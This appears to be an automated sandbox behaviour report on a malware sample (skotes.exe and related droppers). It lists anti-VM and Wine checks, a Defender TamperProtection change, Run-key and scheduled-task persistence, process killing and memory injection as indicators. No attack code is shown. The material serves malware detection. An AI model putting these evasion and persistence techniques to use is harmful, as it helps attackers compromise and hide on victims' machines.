Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\628cb6a5aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\628cb6a5aa.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\91f0bbb4f8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012591001\\91f0bbb4f8.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9edc67fa3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012592001\\b9edc67fa3.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8f8b7f7520.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012593001\\8f8b7f7520.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" C:\Users\Admin\AppData\Local\Temp\smartscreen.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
File opened for modification C:\Windows\MovieArchives C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
File opened for modification C:\Windows\PackageExpression C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012589001\d9c5b97a2f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012590001\628cb6a5aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012591001\91f0bbb4f8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012593001\8f8b7f7520.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\491505\Dr.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012592001\b9edc67fa3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 1056 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 4924 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
PID 2940 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe C:\Windows\SysWOW64\cmd.exe
